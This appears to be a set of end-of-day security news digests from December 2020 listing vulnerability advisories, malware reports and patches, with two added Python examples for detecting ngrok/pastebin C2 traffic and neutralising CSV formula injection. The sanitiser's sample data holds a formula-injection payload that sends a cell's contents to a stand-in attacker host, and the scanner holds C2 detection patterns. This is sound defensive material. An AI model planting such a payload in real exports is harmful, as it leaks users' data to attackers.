Security updates have been issued by Debian (minidlna and x11vnc), Fedora (pam), openSUSE (chromium, minidlna, nsd, openssl-1_1, and pngcheck), SUSE (gcc7 and kernel), and Ubuntu (lxml and squirrelmail).
---------------------------------------------
https://lwn.net/Articles/839861/
∗∗∗ OpenSSL vulnerability CVE-2020-1968 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K92451315
∗∗∗ F5 TMM vulnerability CVE-2020-5950 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K05204103
∗∗∗ F5 TMUI XSS vulnerability CVE-2020-5948 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K42696541
∗∗∗ TMM vulnerability CVE-2020-27713 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K37960100
∗∗∗ BIG-IP LTM vulnerability CVE-2020-5949 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K20984059
∗∗∗ Security Bulletin: IBM Resilient Platform could allow formula injection in Excel (CVE-2020-4633) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-platform-co…
∗∗∗ Security Bulletin: NGINX vulnerability CVE-2019-20372 impacts IBM Aspera High-Speed Transfer Server and Aspera High-Speed Transfer Endpoint versions prior to V4.0 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-nginx-vulnerability-cve-2…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a buffer overflow (CVE-2020-4701) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: Fixed CP4D timeout for IBM Netezza for Cloud Pak for Data 11.1.1.0 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-fixed-cp4d-timeout-for-ib…
∗∗∗ Security Bulletin: OpenSSL vulnerability CVE-2020-1968 impacts IBM Aspera Streaming/IBM Aspera Streaming for Video version 3.9.6.1 and earlier ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-openssl-vulnerability-cve…
∗∗∗ Security Bulletin: App Connect Enterprise Certified Container is vulnerable to code injection and Denial of Service attacks ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce…
∗∗∗ Security Bulletin: HAProxy vulnerability CVE-2019-18277 impacts IBM Aspera High-Speed Transfer Server and Aspera High-Speed Transfer Endpoint versions prior to V4.0 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-haproxy-vulnerability-cve…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to buffer overflow leading to a privileged escalation (CVE-2020-4363) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to an information disclosure. (CVE-2020-4387) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: App Connect Enterprise Certified Container Integration Servers could cause a Denial of Service or a buffer overflow when using MQ ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce…
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 10-12-2020 18:00 − Donnerstag 10-12-2020 18:00
Handler: Stephan Richter
Co-Handler: Dimitri Robl
=====================
= News =
=====================
∗∗∗ Qbot malware switched to stealthy new Windows autostart method ∗∗∗
---------------------------------------------
A new Qbot malware version now activates its persistence mechanism right before infected Windows devices shutdown and it automatically removes any traces when the system restarts or wakes up from sleep.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/qbot-malware-switched-to-ste…
∗∗∗ Adobe Flash Player: now it is finally over ∗∗∗
---------------------------------------------
The end of Adobe Flash Player has been announced for years. In January 2021 it is now actually supposed to happen.
---------------------------------------------
https://www.golem.de/news/adobe-flash-player-jetzt-ist-endgueltig-schluss-2…
∗∗∗ Python Backdoor Talking to a C2 Through Ngrok, (Thu, Dec 10th) ∗∗∗
---------------------------------------------
I spotted a malicious Python script that implements a backdoor. The interesting behavior is the use of Ngrok to connect to the C2 server. Ngrok has been used for a while by attackers. Like most services available on the Internet, it has been abused by attackers for a long time.
---------------------------------------------
https://isc.sans.edu/diary/rss/26866
∗∗∗ PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL ∗∗∗
---------------------------------------------
PGMiner is a novel Linux-based cryptocurrency mining botnet that exploits a disputed PostgreSQL remote code execution vulnerability.
---------------------------------------------
https://unit42.paloaltonetworks.com/pgminer-postgresql-cryptocurrency-minin…
∗∗∗ Hackers are selling more than 85,000 SQL databases on a dark web portal ∗∗∗
---------------------------------------------
Hackers break into databases, steal their content, hold it for ransom for 9 days, and then sell it to the highest bidder if the DB owner doesn't want to pay the ransom demand.
---------------------------------------------
https://www.zdnet.com/article/hackers-are-selling-more-than-85000-sql-datab…
∗∗∗ Proof-of-concept exploit code published for new Kerberos Bronze Bit attack ∗∗∗
---------------------------------------------
The Kerberos Bronze Bit attack can allow intruders to bypass authentication and access sensitive network services.
---------------------------------------------
https://www.zdnet.com/article/proof-of-concept-exploit-code-published-for-n…
=====================
= Vulnerabilities =
=====================
∗∗∗ Reflected XSS in PageLayer Plugin Affects Over 200,000 WordPress Sites ∗∗∗
---------------------------------------------
On November 4, 2020, the Wordfence Threat Intelligence team found two reflected Cross-Site Scripting (XSS) vulnerabilities in PageLayer, a WordPress plugin installed on over 200,000 sites. These vulnerabilities could lead to an attacker executing malicious JavaScript in an administrator's browser, which could lead to takeover of a vulnerable WordPress site. We contacted the plugin's publisher, ...
---------------------------------------------
https://www.wordfence.com/blog/2020/12/reflected-xss-in-pagelayer-plugin-af…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (ant, cimg, containerd, libproxy, libproxy-mozjs, libproxy-webkit, libslirp, python-lxml, tomcat8, tomcat9, and xorg-server), CentOS (firefox and thunderbird), Debian (apt, linux-4.19, python-apt, and sqlite3), Fedora (ceph, chromium, containerd, matrix-synapse, mingw-openjpeg2, openjpeg2, python-authlib, python-canonicaljson, and spice-gtk), Mageia (chromium-browser-stable), openSUSE (chromium and pngcheck), Slackware (curl), SUSE (clamav, curl,
---------------------------------------------
https://lwn.net/Articles/839668/
∗∗∗ Serious Vulnerabilities in Dualog Connection Suite ∗∗∗
---------------------------------------------
TL;DR: The flaws found in this maritime comms and connection suite were many, and not insignificant: directory traversal; 2FA challenge/response performed in a client-side application; default install password; SQL […]
---------------------------------------------
https://www.pentestpartners.com/security-blog/serious-vulnerabilities-in-du…
∗∗∗ Medtronic MyCareLink ∗∗∗
---------------------------------------------
This advisory contains mitigations for Improper Authentication, Heap-based Buffer Overflow, and Time-of-check Time-of-use Race Condition vulnerabilities in the Medtronic MyCareLink Patient Reader.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsma-20-345-01
∗∗∗ Mitsubishi Electric MELSEC iQ-F Series ∗∗∗
---------------------------------------------
This advisory contains mitigations for an Improper Check or Handling of Exceptional Conditions vulnerability in Mitsubishi Electric's MELSEC iQ-F series FX5U(C) CPU modules.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-345-01
∗∗∗ Host Engineering H2-ECOM100 Module ∗∗∗
---------------------------------------------
This advisory contains mitigations for an Improper Input Validation vulnerability in the Host Engineering ECOM100 Module, an Ethernet communications module for PLC systems.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-345-02
∗∗∗ Gafgyt Using Pulse Secure Vulnerability ∗∗∗
---------------------------------------------
Summary: A vulnerability in Pulse Secure's Connect VPN framework is allowing for exploitation by Gafgyt. Avira details how this exploit works in a new blog. Threat type: Malware, Vulnerability. Overview: Avira Labs has observed an increase in IoT malware binaries. These binaries have the capability to exploit CVE-2020-8218. This increase led to the discovery of a new variant of Gafgyt. Its functionality is mostly the same as the original Gafgyt with some inclusion of functionality from other malware
---------------------------------------------
https://exchange.xforce.ibmcloud.com/collection/02145e80d8a7b87b486015b3588…
∗∗∗ Cisco Jabber Desktop and Mobile Client Software Vulnerabilities ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Security Bulletin: Vulnerabilities in Node.js affect IBM App Connect Enterprise V11 ( CVE-2020-8244) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-node-j…
∗∗∗ Security Bulletin: Vulnerabilities in OpenSSL affect IBM Integration Bus and IBM App Connect (CVE-2019-1552) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openss…
∗∗∗ Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in Node.js ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-watson-discovery-for-…
∗∗∗ Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in Apache Commons Codec ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-watson-discovery-for-…
∗∗∗ Security Bulletin: Multiple vulnerabilities affect IBM® SDK for Node.js™ in IBM Cloud ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera…
∗∗∗ Security Bulletin: Vulnerability in Hibernate Validator affects Liberty for Java for IBM Cloud (CVE-2020-10693) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-hibernat…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a buffer overflow (CVE-2020-4701) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: JRE vulnerability (CVEID: 178768) impacts IBM Aspera High-Speed Transfer Server/IBM Aspera High-Speed Transfer Endpoint version 3.9.6.2 and earlier ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-jre-vulnerability-cveid-1…
∗∗∗ Security Bulletin: Vulnerability in ksu affects AIX (CVE-2020-4829) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ksu-affe…
∗∗∗ Symantec Messaging Gateway: Multiple vulnerabilities ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-1222
=====================
= End-of-Day report =
=====================
Timeframe: Monday 07-12-2020 18:00 − Wednesday 09-12-2020 18:00
Handler: Stephan Richter
Co-Handler: Thomas Pribitzer
=====================
= News =
=====================
∗∗∗ Credit card stealing malware bundles backdoor for easy reinstall ∗∗∗
---------------------------------------------
An almost impossible to remove malware set to automatically activate on Black Friday was deployed on multiple Magento-powered online stores by threat actors according to researchers at Dutch cyber-security company Sansec.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/credit-card-stealing-malware…
∗∗∗ Microsoft fixes new Windows Kerberos security bug in staged rollout ∗∗∗
---------------------------------------------
Microsoft has issued security updates to address a Kerberos security feature bypass vulnerability impacting multiple Windows Server versions in a two-phase staged rollout.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/microsoft-fixes-new-windows-…
∗∗∗ IT security: hackers steal hacking tools from FireEye ∗∗∗
---------------------------------------------
The security company is now trying to prevent the worst and is giving tips for defending against its own attack tools.
---------------------------------------------
https://www.golem.de/news/it-security-hacker-klauen-hacking-werkzeuge-von-f…
∗∗∗ OpenSSL fixes memory error ∗∗∗
---------------------------------------------
An update eliminates a null-pointer dereference which, according to the advisory, can lead to a crash.
---------------------------------------------
https://heise.de/-4985050
∗∗∗ Threat Assessment: Egregor Ransomware ∗∗∗
---------------------------------------------
Unit 42 shares courses of action that can help mitigate tactics, techniques and procedures used with Egregor ransomware.
---------------------------------------------
https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/
∗∗∗ njRAT Spreading Through Active Pastebin Command and Control Tunnel ∗∗∗
---------------------------------------------
Malware authors have been leveraging njRAT (AKA Bladabindi), a remote access trojan, to download and deliver second-stage payloads from Pastebin.
---------------------------------------------
https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control/
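Both the Ngrok-backed Python backdoor in the 10 December report above and the njRAT loader described here route command-and-control or payload retrieval through a legitimate, widely used service, which is exactly why plain domain blocklists miss them. The script below is an added example for this digest, not code from either write-up or from the malware analysed there: it parses a few constructed Squid-style proxy access-log lines and flags clients that open connections to ngrok tunnel hostnames or fetch raw pastes from pastebin.com. The log format, the client and server addresses, and the hostname suffix lists are assumptions made for the example.

```python
"""Flag proxy-log clients that talk to services commonly abused for C2.

Added example for this digest: not code from the Ngrok-backdoor diary or the
njRAT write-up. The log format (Squid native access.log), the hostname suffix
lists and every sample line below are assumptions made for the example.
"""
import re
from urllib.parse import urlparse

# Hostname suffixes under which ngrok serves tunnels (ngrok.io historically,
# ngrok.app / ngrok-free.app for newer accounts). Assumed list; extend it from
# your own telemetry.
NGROK_RE = re.compile(r"(^|\.)(ngrok\.io|ngrok\.app|ngrok-free\.app)$")
PASTEBIN_RE = re.compile(r"(^|\.)pastebin\.com$")

# Squid native format:
#   <epoch.ms> <elapsed> <client> <code/status> <bytes> <method> <url> ...
LOG_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)"
)


def parse_line(line):
    """Return a dict with ts/client/method/host/path, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, url = m.group("method"), m.group("url")
    if method == "CONNECT":
        # CONNECT lines carry host:port, not a URL; the path is invisible.
        host, path = url.rsplit(":", 1)[0], None
    else:
        parsed = urlparse(url)
        host, path = parsed.hostname or "", parsed.path
    return {
        "ts": float(m.group("ts")),
        "client": m.group("client"),
        "method": method,
        "host": host.lower(),
        "path": path,
    }


def classify(entry):
    """Label an entry as suspicious, or return None."""
    host, path, method = entry["host"], entry["path"], entry["method"]
    if NGROK_RE.search(host):
        # Any tunnel endpoint is worth a look: the backdoor's C2 sits behind one.
        return "ngrok tunnel"
    if PASTEBIN_RE.search(host):
        # Raw paste fetches are what a loader does; browsing pastebin.com in a
        # browser is common and noisy. A TLS CONNECT hides the path, so report
        # it too rather than miss the fetch.
        if method == "CONNECT" or (path or "").startswith("/raw/"):
            return "pastebin raw fetch or CONNECT"
    return None


def find_suspicious(lines):
    """Return (client, host, label) for each flagged log line, in order."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label:
            hits.append((entry["client"], entry["host"], label))
    return hits


# Constructed sample log (documentation address ranges). The proxy is assumed
# to be TLS-inspecting, so GET lines for https URLs carry the full path.
SAMPLE_LOG = """\
1607600001.123    120 10.0.0.15 TCP_MISS/200 5120 GET http://www.example.com/index.html - HIER_DIRECT/203.0.113.10 text/html
1607600002.456    300 10.0.0.15 TCP_TUNNEL/200 8834 CONNECT 4f1a2b3c.ngrok.io:443 - HIER_DIRECT/203.0.113.11 -
1607600003.789     80 10.0.0.22 TCP_MISS/200 2048 GET https://pastebin.com/raw/AbCdEf12 - HIER_DIRECT/203.0.113.20 text/plain
1607600004.000     50 10.0.0.30 TCP_MISS/200 9000 GET https://pastebin.com/ - HIER_DIRECT/203.0.113.20 text/html
1607600005.000     60 10.0.0.40 TCP_MISS/200 700 GET http://notngrok.io/ - HIER_DIRECT/198.51.100.7 text/html
this line is not a proxy record and is skipped
"""

if __name__ == "__main__":
    for client, host, label in find_suspicious(SAMPLE_LOG.splitlines()):
        print(f"{client} -> {host}: {label}")
```

The suffix anchoring in the regexes matters: `notngrok.io` must not match, and a homepage visit to pastebin.com is deliberately not reported, while a CONNECT to it is, because the proxy cannot see whether the path was `/raw/`. Run it over a real access log with `find_suspicious(open("access.log"))` and tune the suffix lists to the services your environment legitimately uses.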
∗∗∗ Warning: criminals are sending fraudulent e-mails in the name of FinanzOnline ∗∗∗
---------------------------------------------
Fraudsters are currently sending numerous e-mails in the name of the tax office. Supposedly you would receive a tax refund of 1,850 euros.
---------------------------------------------
https://www.watchlist-internet.at/news/achtung-kriminelle-versenden-betrueg…
=====================
= Vulnerabilities =
=====================
∗∗∗ Command injection: NSA warns of VMware vulnerability ∗∗∗
---------------------------------------------
The US intelligence agency NSA sees Russian actors behind attacks on a security vulnerability in VMware products.
---------------------------------------------
https://www.golem.de/news/command-injection-nsa-warnt-vor-vmware-luecke-201…
∗∗∗ D-Link Routers at Risk for Remote Takeover from Zero-Day Flaws ∗∗∗
---------------------------------------------
Critical vulnerabilities discovered by Digital Defense can allow attackers to gain root access and take over devices running same firmware.
---------------------------------------------
https://threatpost.com/d-link-routers-zero-day-flaws/162064/
∗∗∗ Zero-Click Wormable RCE Vulnerability Reported in Microsoft Teams ∗∗∗
---------------------------------------------
A zero-click remote code execution (RCE) bug in Microsoft Teams desktop apps could have allowed an adversary to execute arbitrary code by merely sending a specially crafted chat message and compromise a target's system.
---------------------------------------------
https://thehackernews.com/2020/12/zero-click-wormable-rce-vulnerability.html
∗∗∗ ZDI-20-1400: (0Day) Realtek RTL8811AU Wi-Fi Driver rtwlane Out-Of-Bounds Write Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of the Realtek RTL8811AU Wi-Fi driver.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1400/
∗∗∗ ZDI-20-1399: (0Day) Realtek RTL8811AU Wi-Fi Driver rtwlanu Out-Of-Bounds Write Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of the Realtek RTL8811AU Wi-Fi driver.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1399/
∗∗∗ Update now: Cisco delivers the outstanding update for the Security Manager vulnerability from November ∗∗∗
---------------------------------------------
A fix was still outstanding for a vulnerability rated "High" in Security Manager. Since proof-of-concept code is online, users should act now.
---------------------------------------------
https://heise.de/-4983238
∗∗∗ Patch day: Microsoft plugs critical vulnerabilities in Exchange Server ∗∗∗
---------------------------------------------
Important security updates are available for download for Hyper-V, Office and Windows, among others. Some of the vulnerabilities are rated critical.
---------------------------------------------
https://heise.de/-4984254
∗∗∗ Critical vulnerability in the Python library PyYAML threatens IBM Spectrum Protect ∗∗∗
---------------------------------------------
IBM has released important security updates for IBM Db2 and Spectrum Protect, among others.
---------------------------------------------
https://heise.de/-4983755
∗∗∗ Patch day: Adobe closes critical vulnerabilities - but not in Flash ∗∗∗
---------------------------------------------
Security patches close code-execution vulnerabilities in Adobe Experience Manager, Lightroom and Prelude.
---------------------------------------------
https://heise.de/-4984303
∗∗∗ Patch day: SAP updates block attack paths through partly critical vulnerabilities ∗∗∗
---------------------------------------------
In addition to a NetWeaver vulnerability with the maximum CVSS score of 10, SAP has removed numerous other security problems from its products for patch day.
---------------------------------------------
https://heise.de/-4984262
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (minidlna, openssl, and trafficserver), Mageia (oniguruma, php-pear, python, python3, and x11vnc), openSUSE (minidlna), Oracle (kernel and net-snmp), Red Hat (kernel, mariadb-galera, microcode_ctl, and net-snmp), Slackware (seamonkey), SUSE (thunderbird and xen), and Ubuntu (xorg-server).
---------------------------------------------
https://lwn.net/Articles/839311/
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (golang-golang-x-net-dev, python-certbot, and xorg-server), Fedora (resteasy, scap-security-guide, and vips), openSUSE (chromium, python, and rpmlint), SUSE (kernel), and Ubuntu (aptdaemon, curl, gdk-pixbuf, lxml, and openssl, openssl1.0).
---------------------------------------------
https://lwn.net/Articles/839481/
∗∗∗ December 2020 Android Updates Patch 46 Vulnerabilities ∗∗∗
---------------------------------------------
A total of 46 vulnerabilities were addressed this week with the release of the December 2020 security updates for Android.
---------------------------------------------
https://www.securityweek.com/december-2020-android-updates-patch-46-vulnera…
∗∗∗ Amnesia:33: TCP/IP vulnerabilities endanger millions of internet-capable devices ∗∗∗
---------------------------------------------
The 33 vulnerabilities are spread across four open-source libraries. Manufacturers in turn integrate these libraries into the firmware of routers, switches, printers and many other devices. Often these devices offer no option for updating their software.
---------------------------------------------
https://www.zdnet.de/88390349/amnesia33-tcp-ip-schwachstellen-gefaehrden-mi…
∗∗∗ GE Healthcare Imaging and Ultrasound Products ∗∗∗
---------------------------------------------
This advisory contains mitigations for Unprotected Transport of Credentials and Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerabilities in select GE Healthcare Imaging and Ultrasound products.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsma-20-343-01
∗∗∗ ICS-CERT Security Advisories - December 8th, 2020 ∗∗∗
---------------------------------------------
Summary: ICS-CERT has released nine security advisories addressing vulnerabilities in ICS-related devices and software.
---------------------------------------------
https://exchange.xforce.ibmcloud.com/collection/7b486a6b0dbeee0d5e268e11454…
∗∗∗ Cisco AnyConnect Secure Mobility Client Arbitrary Code Execution Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ IBM Security Bulletins ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/
∗∗∗ Security Advisory - Information Disclosure Vulnerability in TE Mobile Software ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201209-…
∗∗∗ Security Advisory - CSV Injection Vulnerability in iManager NetEco Product ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201209-…
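The IBM Resilient bulletin in the 10 and 11 December reports above (formula injection in Excel, CVE-2020-4633) and the Huawei iManager NetEco advisory here (CSV injection) are the same defect class: a value an attacker typed into the application is written into a spreadsheet export without neutralisation, so a cell that begins with =, +, -, @ (or a tab or carriage return) is evaluated as a formula when an analyst opens the file. The Python below is an added example for this digest, not code from IBM or Huawei: it prefixes such cells with a single quote on export, and it re-reads a CSV to confirm that no cell would be evaluated, which is the check to run against exports produced by code you do not control. The column names, rows and the HYPERLINK payload are constructed for the example.

```python
"""Neutralise spreadsheet formula (CSV) injection in an export.

Added example for this digest, not vendor code. The field names, rows and
the payload below are constructed for the example.
"""
import csv
import io

# Leading characters that make Excel / LibreOffice evaluate a cell as a
# formula (the OWASP CSV-injection list).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

FIELDS = ["id", "reporter", "description"]

# Constructed rows: row 2 carries a formula that would send cell A2 to an
# attacker-controlled host when the analyst opens the export and clicks it.
SAMPLE_ROWS = [
    {"id": 1, "reporter": "alice", "description": "Printer offline since Monday"},
    {"id": 2, "reporter": "mallory",
     "description": '=HYPERLINK("https://attacker.example/?d="&A2,"Open")'},
    {"id": 3, "reporter": "bob", "description": "-3 degrees in server room"},
    {"id": 4, "reporter": "  +1 for the new policy", "description": "ok"},
]


def sanitize_cell(value):
    """Prefix a string with a single quote if a spreadsheet would treat it as
    a formula. The quote forces the cell to be read as text (some spreadsheet
    applications display it, some hide it). Non-strings are returned
    untouched, so keep genuinely numeric columns numeric rather than exporting
    "-3" as text. Leading whitespace is skipped before the check as a
    conservative choice: an unnecessary quote is harmless, a missed formula
    is not."""
    if not isinstance(value, str):
        return value
    if value.lstrip(" \t\r\n").startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def write_csv(rows, fieldnames, sanitize=True):
    """Render rows as CSV text. QUOTE_ALL keeps the protective quote and any
    embedded separators intact when the file is re-parsed."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL,
                            lineterminator="\n")
    writer.writeheader()
    for row in rows:
        out = {k: (sanitize_cell(v) if sanitize else v) for k, v in row.items()}
        writer.writerow(out)
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Audit an existing CSV: return (row, column, cell) for every cell a
    spreadsheet would evaluate. Row 0 is the header line."""
    offending = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.lstrip(" \t\r\n").startswith(FORMULA_TRIGGERS):
                offending.append((r, c, cell))
    return offending


if __name__ == "__main__":
    unsafe = write_csv(SAMPLE_ROWS, FIELDS, sanitize=False)
    print("unsafe export flags:", find_formula_cells(unsafe))
    safe = write_csv(SAMPLE_ROWS, FIELDS)
    print("safe export flags:", find_formula_cells(safe))
    print(safe)
```

The trade-off is visible in row 3: the free-text "-3 degrees in server room" gets a quote it did not strictly need. That is the price of doing the check on strings without knowing the column type; if a column is numeric, export numbers, not strings, and the prefix is never applied. The audit function is also the regression test: run it on every export path after the fix and on any third-party export before you open it in a spreadsheet.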
∗∗∗ LibTIFF vulnerability CVE-2018-18557 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K70117303
∗∗∗ Linux kernel vulnerability CVE-2017-10661 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K04337834
∗∗∗ Linux kernel vulnerability CVE-2017-18344 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K07020416
∗∗∗ NGINX Controller Agent vulnerability CVE-2020-27730 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K43530108
∗∗∗ Linux kernel vulnerability CVE-2018-18397 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K83102920
∗∗∗ Linux kernel vulnerability CVE-2018-1120 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K42202505
∗∗∗ Citrix Secure Mail for Android Security Update ∗∗∗
---------------------------------------------
https://support.citrix.com/article/CTX286763
=====================
= End-of-Day report =
=====================
Timeframe: Friday 04-12-2020 18:00 − Monday 07-12-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Financial Market Authority and Federal Criminal Police Office warn of money-laundering jobs ∗∗∗
---------------------------------------------
Warning: professional money launderers are trying to recruit job seekers as financial agents and misuse them for money laundering.
---------------------------------------------
https://www.watchlist-internet.at/news/finanzmarktaufsicht-und-bundeskrimin…
∗∗∗ Security vulnerability: remote code execution in Microsoft Teams ∗∗∗
---------------------------------------------
An extremely critical security vulnerability was found in the Microsoft Teams desktop client, but Microsoft played the problem down.
---------------------------------------------
https://www.golem.de/news/sicherheitsluecke-remote-code-execution-in-micros…
∗∗∗ What is Ransomware - 15 Easy Steps To Protect Your System [Updated 2020] ∗∗∗
---------------------------------------------
May 12th 2017 saw the biggest ever cyber attack in Internet history (yes, bigger than the Dyn DDoS). A ransomware named WannaCry stormed through the web, with the damage epicenter being in Europe. WannaCry leveraged a vulnerability in Windows OS, first discovered by the NSA, and then publicly revealed to the world by the Shadow [...]
---------------------------------------------
https://heimdalsecurity.com/blog/what-is-ransomware-protection/
∗∗∗ Obfuscation Techniques in MARIJUANA Shell "Bypass" ∗∗∗
---------------------------------------------
Attackers are always trying to come up with new ways to evade detection from the wide range of security controls available for web applications. This also extends to malware like PHP shells, which are typically left on compromised websites as a backdoor to maintain unauthorized access. MARIJUANA is the name of a PHP shell that we have been tracking since last year.
---------------------------------------------
https://blog.sucuri.net/2020/12/obfuscation-techniques-in-marijuana-shell-b…
∗∗∗ Payment Card Skimmer Group Using Raccoon Info-Stealer to Siphon Off Data ∗∗∗
---------------------------------------------
A cybercrime group known for targeting e-commerce websites unleashed a "multi-stage malicious campaign" earlier this year designed with an intent to distribute information stealers and JavaScript-based payment skimmers. In a new report published today and shared with The Hacker News, Singapore-based cybersecurity firm Group-IB attributed the operation to the same group that's been linked to a [...]
---------------------------------------------
https://thehackernews.com/2020/12/payment-card-skimmer-group-using.html
∗∗∗ Exploitation of Windows RDP Vulnerability CVE-2019-0708 (BlueKeep): Get RCE with System Privilege Using Refresh Rect PDU and RDPDR Client Name Request PDU ∗∗∗
---------------------------------------------
To better protect Windows users, we discuss how attackers might exploit CVE-2019-0708 (BlueKeep) on Windows RDP endpoints.
---------------------------------------------
https://unit42.paloaltonetworks.com/cve-2019-0708-bluekeep/
∗∗∗ Shodan Verified Vulns 2020-12 ∗∗∗
---------------------------------------------
In December too, we want to take a look at the vulnerabilities that Shodan sees in Austria. The following graphic is based on data from 2020-12-01: [...]
---------------------------------------------
https://cert.at/de/aktuelles/2020/12/shodan-verified-vulns-2020-12
=====================
= Vulnerabilities =
=====================
∗∗∗ QNAP patches QTS vulnerabilities allowing NAS device takeover ∗∗∗
---------------------------------------------
Network-attached storage (NAS) maker QNAP today released security updates to address vulnerabilities that could enable attackers to take control of unpatched NAS devices following successful exploitation.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/qnap-patches-qts-vulnerabili…
∗∗∗ Cisco Security Manager Java Deserialization Vulnerabilities ∗∗∗
---------------------------------------------
Multiple vulnerabilities in the Java deserialization function that is used by Cisco Security Manager could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device.
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
